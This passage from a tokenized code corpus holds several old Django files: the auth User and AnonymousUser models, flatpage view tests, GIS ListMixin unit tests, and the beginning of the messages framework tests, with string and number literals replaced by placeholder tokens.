datetime . datetime . now ) <EOL> date_joined = models . DateTimeField ( _ ( '<STR_LIT>' ) , default = datetime . datetime . now ) <EOL> groups = models . ManyToManyField ( Group , verbose_name = _ ( '<STR_LIT>' ) , blank = True , <EOL> help_text = _ ( "<STR_LIT>" ) ) <EOL> user_permissions = models . ManyToManyField ( Permission , verbose_name = _ ( '<STR_LIT>' ) , blank = True ) <EOL> objects = UserManager ( ) <EOL> class Meta : <EOL> verbose_name = _ ( '<STR_LIT:user>' ) <EOL> verbose_name_plural = _ ( '<STR_LIT>' ) <EOL> def __unicode__ ( self ) : <EOL> return self . 
username <EOL> def get_absolute_url ( self ) : <EOL> return "<STR_LIT>" % urllib . quote ( smart_str ( self . username ) ) <EOL> def is_anonymous ( self ) : <EOL> """<STR_LIT>""" <EOL> return False <EOL> def is_authenticated ( self ) : <EOL> """<STR_LIT>""" <EOL> return True <EOL> def get_full_name ( self ) : <EOL> "<STR_LIT>" <EOL> full_name = u'<STR_LIT>' % ( self . first_name , self . last_name ) <EOL> return full_name . strip ( ) <EOL> def set_password ( self , raw_password ) : <EOL> if raw_password is None : <EOL> self . set_unusable_password ( ) <EOL> else : <EOL> import random <EOL> algo = '<STR_LIT>' <EOL> salt = get_hexdigest ( algo , str ( random . random ( ) ) , str ( random . random ( ) ) ) [ : <NUM_LIT:5> ] <EOL> hsh = get_hexdigest ( algo , salt , raw_password ) <EOL> self . password = '<STR_LIT>' % ( algo , salt , hsh ) <EOL> def check_password ( self , raw_password ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT:$>' not in self . password : <EOL> is_correct = ( self . password == get_hexdigest ( '<STR_LIT>' , '<STR_LIT>' , raw_password ) ) <EOL> if is_correct : <EOL> self . set_password ( raw_password ) <EOL> self . save ( ) <EOL> return is_correct <EOL> return check_password ( raw_password , self . password ) <EOL> def set_unusable_password ( self ) : <EOL> self . password = UNUSABLE_PASSWORD <EOL> def has_usable_password ( self ) : <EOL> if self . password is None or self . password == UNUSABLE_PASSWORD : <EOL> return False <EOL> else : <EOL> return True <EOL> def get_group_permissions ( self , obj = None ) : <EOL> """<STR_LIT>""" <EOL> permissions = set ( ) <EOL> for backend in auth . get_backends ( ) : <EOL> if hasattr ( backend , "<STR_LIT>" ) : <EOL> if obj is not None : <EOL> if backend . supports_object_permissions : <EOL> permissions . update ( <EOL> backend . get_group_permissions ( self , obj ) <EOL> ) <EOL> else : <EOL> permissions . update ( backend . 
get_group_permissions ( self ) ) <EOL> return permissions <EOL> def get_all_permissions ( self , obj = None ) : <EOL> return _user_get_all_permissions ( self , obj ) <EOL> def has_perm ( self , perm , obj = None ) : <EOL> """<STR_LIT>""" <EOL> if self . is_active and self . is_superuser : <EOL> return True <EOL> return _user_has_perm ( self , perm , obj ) <EOL> def has_perms ( self , perm_list , obj = None ) : <EOL> """<STR_LIT>""" <EOL> for perm in perm_list : <EOL> if not self . has_perm ( perm , obj ) : <EOL> return False <EOL> return True <EOL> def has_module_perms ( self , app_label ) : <EOL> """<STR_LIT>""" <EOL> if self . is_active and self . is_superuser : <EOL> return True <EOL> return _user_has_module_perms ( self , app_label ) <EOL> def get_and_delete_messages ( self ) : <EOL> messages = [ ] <EOL> for m in self . message_set . all ( ) : <EOL> messages . append ( m . message ) <EOL> m . delete ( ) <EOL> return messages <EOL> def email_user ( self , subject , message , from_email = None ) : <EOL> "<STR_LIT>" <EOL> from django . core . mail import send_mail <EOL> send_mail ( subject , message , from_email , [ self . email ] ) <EOL> def get_profile ( self ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> from django . conf import settings <EOL> if not getattr ( settings , '<STR_LIT>' , False ) : <EOL> raise SiteProfileNotAvailable ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> try : <EOL> app_label , model_name = settings . AUTH_PROFILE_MODULE . split ( '<STR_LIT:.>' ) <EOL> except ValueError : <EOL> raise SiteProfileNotAvailable ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> try : <EOL> model = models . get_model ( app_label , model_name ) <EOL> if model is None : <EOL> raise SiteProfileNotAvailable ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _profile_cache = model . _default_manager . using ( self . _state . db ) . get ( user__id__exact = self . id ) <EOL> self . _profile_cache . 
user = self <EOL> except ( ImportError , ImproperlyConfigured ) : <EOL> raise SiteProfileNotAvailable <EOL> return self . _profile_cache <EOL> def _get_message_set ( self ) : <EOL> import warnings <EOL> warnings . warn ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> category = DeprecationWarning ) <EOL> return self . _message_set <EOL> message_set = property ( _get_message_set ) <EOL> class Message ( models . Model ) : <EOL> """<STR_LIT>""" <EOL> user = models . ForeignKey ( User , related_name = '<STR_LIT>' ) <EOL> message = models . TextField ( _ ( '<STR_LIT:message>' ) ) <EOL> def __unicode__ ( self ) : <EOL> return self . message <EOL> class AnonymousUser ( object ) : <EOL> id = None <EOL> username = '<STR_LIT>' <EOL> is_staff = False <EOL> is_active = False <EOL> is_superuser = False <EOL> _groups = EmptyManager ( ) <EOL> _user_permissions = EmptyManager ( ) <EOL> def __init__ ( self ) : <EOL> pass <EOL> def __unicode__ ( self ) : <EOL> return '<STR_LIT>' <EOL> def __str__ ( self ) : <EOL> return unicode ( self ) . encode ( '<STR_LIT:utf-8>' ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) <EOL> def __ne__ ( self , other ) : <EOL> return not self . __eq__ ( other ) <EOL> def __hash__ ( self ) : <EOL> return <NUM_LIT:1> <EOL> def save ( self ) : <EOL> raise NotImplementedError <EOL> def delete ( self ) : <EOL> raise NotImplementedError <EOL> def set_password ( self , raw_password ) : <EOL> raise NotImplementedError <EOL> def check_password ( self , raw_password ) : <EOL> raise NotImplementedError <EOL> def _get_groups ( self ) : <EOL> return self . _groups <EOL> groups = property ( _get_groups ) <EOL> def _get_user_permissions ( self ) : <EOL> return self . 
_user_permissions <EOL> user_permissions = property ( _get_user_permissions ) <EOL> def get_group_permissions ( self , obj = None ) : <EOL> return set ( ) <EOL> def get_all_permissions ( self , obj = None ) : <EOL> return _user_get_all_permissions ( self , obj = obj ) <EOL> def has_perm ( self , perm , obj = None ) : <EOL> return _user_has_perm ( self , perm , obj = obj ) <EOL> def has_perms ( self , perm_list , obj = None ) : <EOL> for perm in perm_list : <EOL> if not self . has_perm ( perm , obj ) : <EOL> return False <EOL> return True <EOL> def has_module_perms ( self , module ) : <EOL> return _user_has_module_perms ( self , module ) <EOL> def get_and_delete_messages ( self ) : <EOL> return [ ] <EOL> def is_anonymous ( self ) : <EOL> return True <EOL> def is_authenticated ( self ) : <EOL> return False </s>
<s> import os <EOL> from django . conf import settings <EOL> from django . contrib . auth . models import User <EOL> from django . contrib . flatpages . models import FlatPage <EOL> from django . test import TestCase <EOL> class FlatpageViewTests ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> urls = '<STR_LIT>' <EOL> def setUp ( self ) : <EOL> self . old_MIDDLEWARE_CLASSES = settings . MIDDLEWARE_CLASSES <EOL> flatpage_middleware_class = '<STR_LIT>' <EOL> if flatpage_middleware_class in settings . MIDDLEWARE_CLASSES : <EOL> settings . MIDDLEWARE_CLASSES = tuple ( m for m in settings . MIDDLEWARE_CLASSES if m != flatpage_middleware_class ) <EOL> self . old_TEMPLATE_DIRS = settings . TEMPLATE_DIRS <EOL> settings . TEMPLATE_DIRS = ( <EOL> os . path . join ( <EOL> os . path . dirname ( __file__ ) , <EOL> '<STR_LIT>' <EOL> ) , <EOL> ) <EOL> self . old_LOGIN_URL = settings . LOGIN_URL <EOL> settings . LOGIN_URL = '<STR_LIT>' <EOL> def tearDown ( self ) : <EOL> settings . MIDDLEWARE_CLASSES = self . old_MIDDLEWARE_CLASSES <EOL> settings . TEMPLATE_DIRS = self . old_TEMPLATE_DIRS <EOL> settings . LOGIN_URL = self . old_LOGIN_URL <EOL> def test_view_flatpage ( self ) : <EOL> "<STR_LIT>" <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> def test_view_non_existent_flatpage ( self ) : <EOL> "<STR_LIT>" <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_view_authenticated_flatpage ( self ) : <EOL> "<STR_LIT>" <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertRedirects ( response , '<STR_LIT>' ) <EOL> User . objects . create_user ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . 
status_code , <NUM_LIT:200> ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> def test_fallback_flatpage ( self ) : <EOL> "<STR_LIT>" <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_fallback_non_existent_flatpage ( self ) : <EOL> "<STR_LIT>" <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_view_flatpage_special_chars ( self ) : <EOL> "<STR_LIT>" <EOL> fp = FlatPage . objects . create ( <EOL> url = "<STR_LIT>" , <EOL> title = "<STR_LIT>" , <EOL> content = "<STR_LIT>" , <EOL> enable_comments = False , <EOL> registration_required = False , <EOL> ) <EOL> fp . sites . add ( settings . SITE_ID ) <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertContains ( response , "<STR_LIT>" ) </s>
<s> from django . contrib . gis . geos . mutable_list import ListMixin <EOL> from django . utils import unittest <EOL> class UserListA ( ListMixin ) : <EOL> _mytype = tuple <EOL> def __init__ ( self , i_list , * args , ** kwargs ) : <EOL> self . _list = self . _mytype ( i_list ) <EOL> super ( UserListA , self ) . __init__ ( * args , ** kwargs ) <EOL> def __len__ ( self ) : return len ( self . _list ) <EOL> def __str__ ( self ) : return str ( self . _list ) <EOL> def __repr__ ( self ) : return repr ( self . _list ) <EOL> def _set_list ( self , length , items ) : <EOL> itemList = [ '<STR_LIT:x>' ] * length <EOL> for i , v in enumerate ( items ) : <EOL> itemList [ i ] = v <EOL> self . _list = self . _mytype ( itemList ) <EOL> def _get_single_external ( self , index ) : <EOL> return self . _list [ index ] <EOL> class UserListB ( UserListA ) : <EOL> _mytype = list <EOL> def _set_single ( self , index , value ) : <EOL> self . _list [ index ] = value <EOL> def nextRange ( length ) : <EOL> nextRange . start += <NUM_LIT:100> <EOL> return range ( nextRange . start , nextRange . start + length ) <EOL> nextRange . start = <NUM_LIT:0> <EOL> class ListMixinTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> limit = <NUM_LIT:3> <EOL> listType = UserListA <EOL> def lists_of_len ( self , length = None ) : <EOL> if length is None : length = self . limit <EOL> pl = range ( length ) <EOL> return pl , self . listType ( pl ) <EOL> def limits_plus ( self , b ) : <EOL> return range ( - self . limit - b , self . limit + b ) <EOL> def step_range ( self ) : <EOL> return range ( - <NUM_LIT:1> - self . limit , <NUM_LIT:0> ) + range ( <NUM_LIT:1> , <NUM_LIT:1> + self . limit ) <EOL> def test01_getslice ( self ) : <EOL> '<STR_LIT>' <EOL> pl , ul = self . lists_of_len ( ) <EOL> for i in self . limits_plus ( <NUM_LIT:1> ) : <EOL> self . assertEqual ( pl [ i : ] , ul [ i : ] , '<STR_LIT>' % ( i ) ) <EOL> self . 
assertEqual ( pl [ : i ] , ul [ : i ] , '<STR_LIT>' % ( i ) ) <EOL> for j in self . limits_plus ( <NUM_LIT:1> ) : <EOL> self . assertEqual ( pl [ i : j ] , ul [ i : j ] , '<STR_LIT>' % ( i , j ) ) <EOL> for k in self . step_range ( ) : <EOL> self . assertEqual ( pl [ i : j : k ] , ul [ i : j : k ] , '<STR_LIT>' % ( i , j , k ) ) <EOL> for k in self . step_range ( ) : <EOL> self . assertEqual ( pl [ i : : k ] , ul [ i : : k ] , '<STR_LIT>' % ( i , k ) ) <EOL> self . assertEqual ( pl [ : i : k ] , ul [ : i : k ] , '<STR_LIT>' % ( i , k ) ) <EOL> for k in self . step_range ( ) : <EOL> self . assertEqual ( pl [ : : k ] , ul [ : : k ] , '<STR_LIT>' % ( k ) ) <EOL> def test02_setslice ( self ) : <EOL> '<STR_LIT>' <EOL> def setfcn ( x , i , j , k , L ) : x [ i : j : k ] = range ( L ) <EOL> pl , ul = self . lists_of_len ( ) <EOL> for slen in range ( self . limit + <NUM_LIT:1> ) : <EOL> ssl = nextRange ( slen ) <EOL> ul [ : ] = ssl <EOL> pl [ : ] = ssl <EOL> self . assertEqual ( pl , ul [ : ] , '<STR_LIT>' ) <EOL> for i in self . limits_plus ( <NUM_LIT:1> ) : <EOL> ssl = nextRange ( slen ) <EOL> ul [ i : ] = ssl <EOL> pl [ i : ] = ssl <EOL> self . assertEqual ( pl , ul [ : ] , '<STR_LIT>' % ( i ) ) <EOL> ssl = nextRange ( slen ) <EOL> ul [ : i ] = ssl <EOL> pl [ : i ] = ssl <EOL> self . assertEqual ( pl , ul [ : ] , '<STR_LIT>' % ( i ) ) <EOL> for j in self . limits_plus ( <NUM_LIT:1> ) : <EOL> ssl = nextRange ( slen ) <EOL> ul [ i : j ] = ssl <EOL> pl [ i : j ] = ssl <EOL> self . assertEqual ( pl , ul [ : ] , '<STR_LIT>' % ( i , j ) ) <EOL> for k in self . step_range ( ) : <EOL> ssl = nextRange ( len ( ul [ i : j : k ] ) ) <EOL> ul [ i : j : k ] = ssl <EOL> pl [ i : j : k ] = ssl <EOL> self . assertEqual ( pl , ul [ : ] , '<STR_LIT>' % ( i , j , k ) ) <EOL> sliceLen = len ( ul [ i : j : k ] ) <EOL> self . assertRaises ( ValueError , setfcn , ul , i , j , k , sliceLen + <NUM_LIT:1> ) <EOL> if sliceLen > <NUM_LIT:2> : <EOL> self . 
assertRaises ( ValueError , setfcn , ul , i , j , k , sliceLen - <NUM_LIT:1> ) <EOL> for k in self . step_range ( ) : <EOL> ssl = nextRange ( len ( ul [ i : : k ] ) ) <EOL> ul [ i : : k ] = ssl <EOL> pl [ i : : k ] = ssl <EOL> self . assertEqual ( pl , ul [ : ] , '<STR_LIT>' % ( i , k ) ) <EOL> ssl = nextRange ( len ( ul [ : i : k ] ) ) <EOL> ul [ : i : k ] = ssl <EOL> pl [ : i : k ] = ssl <EOL> self . assertEqual ( pl , ul [ : ] , '<STR_LIT>' % ( i , k ) ) <EOL> for k in self . step_range ( ) : <EOL> ssl = nextRange ( len ( ul [ : : k ] ) ) <EOL> ul [ : : k ] = ssl <EOL> pl [ : : k ] = ssl <EOL> self . assertEqual ( pl , ul [ : ] , '<STR_LIT>' % ( k ) ) <EOL> def test03_delslice ( self ) : <EOL> '<STR_LIT>' <EOL> for Len in range ( self . limit ) : <EOL> pl , ul = self . lists_of_len ( Len ) <EOL> del pl [ : ] <EOL> del ul [ : ] <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' ) <EOL> for i in range ( - Len - <NUM_LIT:1> , Len + <NUM_LIT:1> ) : <EOL> pl , ul = self . lists_of_len ( Len ) <EOL> del pl [ i : ] <EOL> del ul [ i : ] <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' % ( i ) ) <EOL> pl , ul = self . lists_of_len ( Len ) <EOL> del pl [ : i ] <EOL> del ul [ : i ] <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' % ( i ) ) <EOL> for j in range ( - Len - <NUM_LIT:1> , Len + <NUM_LIT:1> ) : <EOL> pl , ul = self . lists_of_len ( Len ) <EOL> del pl [ i : j ] <EOL> del ul [ i : j ] <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' % ( i , j ) ) <EOL> for k in range ( - Len - <NUM_LIT:1> , <NUM_LIT:0> ) + range ( <NUM_LIT:1> , Len ) : <EOL> pl , ul = self . lists_of_len ( Len ) <EOL> del pl [ i : j : k ] <EOL> del ul [ i : j : k ] <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' % ( i , j , k ) ) <EOL> for k in range ( - Len - <NUM_LIT:1> , <NUM_LIT:0> ) + range ( <NUM_LIT:1> , Len ) : <EOL> pl , ul = self . lists_of_len ( Len ) <EOL> del pl [ : i : k ] <EOL> del ul [ : i : k ] <EOL> self . 
assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' % ( i , k ) ) <EOL> pl , ul = self . lists_of_len ( Len ) <EOL> del pl [ i : : k ] <EOL> del ul [ i : : k ] <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' % ( i , k ) ) <EOL> for k in range ( - Len - <NUM_LIT:1> , <NUM_LIT:0> ) + range ( <NUM_LIT:1> , Len ) : <EOL> pl , ul = self . lists_of_len ( Len ) <EOL> del pl [ : : k ] <EOL> del ul [ : : k ] <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' % ( k ) ) <EOL> def test04_get_set_del_single ( self ) : <EOL> '<STR_LIT>' <EOL> pl , ul = self . lists_of_len ( ) <EOL> for i in self . limits_plus ( <NUM_LIT:0> ) : <EOL> self . assertEqual ( pl [ i ] , ul [ i ] , '<STR_LIT>' % i ) <EOL> for i in self . limits_plus ( <NUM_LIT:0> ) : <EOL> pl , ul = self . lists_of_len ( ) <EOL> pl [ i ] = <NUM_LIT:100> <EOL> ul [ i ] = <NUM_LIT:100> <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' % i ) <EOL> for i in self . limits_plus ( <NUM_LIT:0> ) : <EOL> pl , ul = self . lists_of_len ( ) <EOL> del pl [ i ] <EOL> del ul [ i ] <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' % i ) <EOL> def test05_out_of_range_exceptions ( self ) : <EOL> '<STR_LIT>' <EOL> def setfcn ( x , i ) : x [ i ] = <NUM_LIT:20> <EOL> def getfcn ( x , i ) : return x [ i ] <EOL> def delfcn ( x , i ) : del x [ i ] <EOL> pl , ul = self . lists_of_len ( ) <EOL> for i in ( - <NUM_LIT:1> - self . limit , self . limit ) : <EOL> self . assertRaises ( IndexError , setfcn , ul , i ) <EOL> self . assertRaises ( IndexError , getfcn , ul , i ) <EOL> self . assertRaises ( IndexError , delfcn , ul , i ) <EOL> def test06_list_methods ( self ) : <EOL> '<STR_LIT>' <EOL> pl , ul = self . lists_of_len ( ) <EOL> pl . append ( <NUM_LIT> ) <EOL> ul . append ( <NUM_LIT> ) <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' ) <EOL> pl . extend ( range ( <NUM_LIT:50> , <NUM_LIT> ) ) <EOL> ul . extend ( range ( <NUM_LIT:50> , <NUM_LIT> ) ) <EOL> self . 
assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' ) <EOL> pl . reverse ( ) <EOL> ul . reverse ( ) <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' ) <EOL> for i in self . limits_plus ( <NUM_LIT:1> ) : <EOL> pl , ul = self . lists_of_len ( ) <EOL> pl . insert ( i , <NUM_LIT:50> ) <EOL> ul . insert ( i , <NUM_LIT:50> ) <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' % i ) <EOL> for i in self . limits_plus ( <NUM_LIT:0> ) : <EOL> pl , ul = self . lists_of_len ( ) <EOL> self . assertEqual ( pl . pop ( i ) , ul . pop ( i ) , '<STR_LIT>' % i ) <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' % i ) <EOL> pl , ul = self . lists_of_len ( ) <EOL> self . assertEqual ( pl . pop ( ) , ul . pop ( i ) , '<STR_LIT>' ) <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' ) <EOL> pl , ul = self . lists_of_len ( ) <EOL> def popfcn ( x , i ) : x . pop ( i ) <EOL> self . assertRaises ( IndexError , popfcn , ul , self . limit ) <EOL> self . assertRaises ( IndexError , popfcn , ul , - <NUM_LIT:1> - self . limit ) <EOL> pl , ul = self . lists_of_len ( ) <EOL> for val in range ( self . limit ) : <EOL> self . assertEqual ( pl . index ( val ) , ul . index ( val ) , '<STR_LIT>' % val ) <EOL> for val in self . limits_plus ( <NUM_LIT:2> ) : <EOL> self . assertEqual ( pl . count ( val ) , ul . count ( val ) , '<STR_LIT>' % val ) <EOL> for val in range ( self . limit ) : <EOL> pl , ul = self . lists_of_len ( ) <EOL> pl . remove ( val ) <EOL> ul . remove ( val ) <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' % val ) <EOL> def indexfcn ( x , v ) : return x . index ( v ) <EOL> def removefcn ( x , v ) : return x . remove ( v ) <EOL> self . assertRaises ( ValueError , indexfcn , ul , <NUM_LIT> ) <EOL> self . assertRaises ( ValueError , removefcn , ul , <NUM_LIT> ) <EOL> def test07_allowed_types ( self ) : <EOL> '<STR_LIT>' <EOL> pl , ul = self . lists_of_len ( ) <EOL> ul . 
_allowed = ( int , long ) <EOL> ul [ <NUM_LIT:1> ] = <NUM_LIT:50> <EOL> ul [ : <NUM_LIT:2> ] = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> def setfcn ( x , i , v ) : x [ i ] = v <EOL> self . assertRaises ( TypeError , setfcn , ul , <NUM_LIT:2> , '<STR_LIT:hello>' ) <EOL> self . assertRaises ( TypeError , setfcn , ul , slice ( <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:2> ) , ( '<STR_LIT:hello>' , '<STR_LIT>' ) ) <EOL> def test08_min_length ( self ) : <EOL> '<STR_LIT>' <EOL> pl , ul = self . lists_of_len ( ) <EOL> ul . _minlength = <NUM_LIT:1> <EOL> def delfcn ( x , i ) : del x [ : i ] <EOL> def setfcn ( x , i ) : x [ : i ] = [ ] <EOL> for i in range ( self . limit - ul . _minlength + <NUM_LIT:1> , self . limit + <NUM_LIT:1> ) : <EOL> self . assertRaises ( ValueError , delfcn , ul , i ) <EOL> self . assertRaises ( ValueError , setfcn , ul , i ) <EOL> del ul [ : ul . _minlength ] <EOL> ul . _maxlength = <NUM_LIT:4> <EOL> for i in range ( <NUM_LIT:0> , ul . _maxlength - len ( ul ) ) : <EOL> ul . append ( i ) <EOL> self . assertRaises ( ValueError , ul . append , <NUM_LIT:10> ) <EOL> def test09_iterable_check ( self ) : <EOL> '<STR_LIT>' <EOL> pl , ul = self . lists_of_len ( self . limit + <NUM_LIT:1> ) <EOL> def setfcn ( x , i , v ) : x [ i ] = v <EOL> self . assertRaises ( TypeError , setfcn , ul , slice ( <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:2> ) , <NUM_LIT:2> ) <EOL> def test10_checkindex ( self ) : <EOL> '<STR_LIT>' <EOL> pl , ul = self . lists_of_len ( ) <EOL> for i in self . limits_plus ( <NUM_LIT:0> ) : <EOL> if i < <NUM_LIT:0> : <EOL> self . assertEqual ( ul . _checkindex ( i ) , i + self . limit , '<STR_LIT>' ) <EOL> else : <EOL> self . assertEqual ( ul . _checkindex ( i ) , i , '<STR_LIT>' ) <EOL> for i in ( - self . limit - <NUM_LIT:1> , self . limit ) : <EOL> self . assertRaises ( IndexError , ul . _checkindex , i ) <EOL> ul . _IndexError = TypeError <EOL> self . assertRaises ( TypeError , ul . _checkindex , - self . 
limit - <NUM_LIT:1> ) <EOL> def test_11_sorting ( self ) : <EOL> '<STR_LIT>' <EOL> pl , ul = self . lists_of_len ( ) <EOL> pl . insert ( <NUM_LIT:0> , pl . pop ( ) ) <EOL> ul . insert ( <NUM_LIT:0> , ul . pop ( ) ) <EOL> pl . sort ( ) <EOL> ul . sort ( ) <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' ) <EOL> mid = pl [ len ( pl ) / <NUM_LIT:2> ] <EOL> pl . sort ( key = lambda x : ( mid - x ) ** <NUM_LIT:2> ) <EOL> ul . sort ( key = lambda x : ( mid - x ) ** <NUM_LIT:2> ) <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' ) <EOL> pl . insert ( <NUM_LIT:0> , pl . pop ( ) ) <EOL> ul . insert ( <NUM_LIT:0> , ul . pop ( ) ) <EOL> pl . sort ( reverse = True ) <EOL> ul . sort ( reverse = True ) <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' ) <EOL> mid = pl [ len ( pl ) / <NUM_LIT:2> ] <EOL> pl . sort ( key = lambda x : ( mid - x ) ** <NUM_LIT:2> ) <EOL> ul . sort ( key = lambda x : ( mid - x ) ** <NUM_LIT:2> ) <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' ) <EOL> def test_12_arithmetic ( self ) : <EOL> '<STR_LIT>' <EOL> pl , ul = self . lists_of_len ( ) <EOL> al = range ( <NUM_LIT:10> , <NUM_LIT> ) <EOL> self . assertEqual ( list ( pl + al ) , list ( ul + al ) , '<STR_LIT>' ) <EOL> self . assertEqual ( type ( ul ) , type ( ul + al ) , '<STR_LIT>' ) <EOL> self . assertEqual ( list ( al + pl ) , list ( al + ul ) , '<STR_LIT>' ) <EOL> self . assertEqual ( type ( al ) , type ( al + ul ) , '<STR_LIT>' ) <EOL> objid = id ( ul ) <EOL> pl += al <EOL> ul += al <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' ) <EOL> self . assertEqual ( objid , id ( ul ) , '<STR_LIT>' ) <EOL> for n in ( - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:3> ) : <EOL> pl , ul = self . lists_of_len ( ) <EOL> self . assertEqual ( list ( pl * n ) , list ( ul * n ) , '<STR_LIT>' % n ) <EOL> self . assertEqual ( type ( ul ) , type ( ul * n ) , '<STR_LIT>' % n ) <EOL> self . 
assertEqual ( list ( n * pl ) , list ( n * ul ) , '<STR_LIT>' % n ) <EOL> self . assertEqual ( type ( ul ) , type ( n * ul ) , '<STR_LIT>' % n ) <EOL> objid = id ( ul ) <EOL> pl *= n <EOL> ul *= n <EOL> self . assertEqual ( pl [ : ] , ul [ : ] , '<STR_LIT>' % n ) <EOL> self . assertEqual ( objid , id ( ul ) , '<STR_LIT>' % n ) <EOL> pl , ul = self . lists_of_len ( ) <EOL> self . assertEqual ( pl , ul , '<STR_LIT>' ) <EOL> self . assertTrue ( pl >= ul , '<STR_LIT>' ) <EOL> self . assertTrue ( pl <= ul , '<STR_LIT>' ) <EOL> self . assertTrue ( ul >= pl , '<STR_LIT>' ) <EOL> self . assertTrue ( ul <= pl , '<STR_LIT>' ) <EOL> self . assertTrue ( pl + [ <NUM_LIT:5> ] > ul , '<STR_LIT>' ) <EOL> self . assertTrue ( pl + [ <NUM_LIT:5> ] >= ul , '<STR_LIT>' ) <EOL> self . assertTrue ( pl < ul + [ <NUM_LIT:2> ] , '<STR_LIT>' ) <EOL> self . assertTrue ( pl <= ul + [ <NUM_LIT:2> ] , '<STR_LIT>' ) <EOL> self . assertTrue ( ul + [ <NUM_LIT:5> ] > pl , '<STR_LIT>' ) <EOL> self . assertTrue ( ul + [ <NUM_LIT:5> ] >= pl , '<STR_LIT>' ) <EOL> self . assertTrue ( ul < pl + [ <NUM_LIT:2> ] , '<STR_LIT>' ) <EOL> self . assertTrue ( ul <= pl + [ <NUM_LIT:2> ] , '<STR_LIT>' ) <EOL> pl [ <NUM_LIT:1> ] = <NUM_LIT:20> <EOL> self . assertTrue ( pl > ul , '<STR_LIT>' ) <EOL> self . assertTrue ( ul < pl , '<STR_LIT>' ) <EOL> pl [ <NUM_LIT:1> ] = - <NUM_LIT:20> <EOL> self . assertTrue ( pl < ul , '<STR_LIT>' ) <EOL> self . assertTrue ( pl < ul , '<STR_LIT>' ) <EOL> class ListMixinTestSingle ( ListMixinTest ) : <EOL> listType = UserListB <EOL> def suite ( ) : <EOL> s = unittest . TestSuite ( ) <EOL> s . addTest ( unittest . makeSuite ( ListMixinTest ) ) <EOL> s . addTest ( unittest . makeSuite ( ListMixinTestSingle ) ) <EOL> return s <EOL> def run ( verbosity = <NUM_LIT:2> ) : <EOL> unittest . TextTestRunner ( verbosity = verbosity ) . run ( suite ( ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> run ( ) </s>
<s> import warnings <EOL> from django import http <EOL> from django . test import TestCase <EOL> from django . conf import settings <EOL> from django . utils . translation import ugettext_lazy <EOL> from django . utils . unittest import skipIf <EOL> from django . contrib . messages import constants , utils , get_level , set_level <EOL> from django . contrib . messages . api import MessageFailure <EOL> from django . contrib . messages . storage import default_storage , base <EOL> from django . contrib . messages . storage . base import Message <EOL> from django . core . urlresolvers import reverse <EOL> from django . contrib . auth . models import User <EOL> def skipUnlessAuthIsInstalled ( func ) : <EOL> return skipIf ( <EOL> '<STR_LIT>' not in settings . INSTALLED_APPS , <EOL> "<STR_LIT>" ) ( func ) <EOL> def add_level_messages ( storage ) : <EOL> """<STR_LIT>""" <EOL> storage . add ( constants . INFO , '<STR_LIT>' ) <EOL> storage . add ( <NUM_LIT> , '<STR_LIT>' ) <EOL> storage . add ( constants . DEBUG , '<STR_LIT>' , extra_tags = '<STR_LIT>' ) <EOL> storage . add ( constants . WARNING , '<STR_LIT>' ) <EOL> storage . add ( constants . ERROR , '<STR_LIT>' ) <EOL> storage . add ( constants . 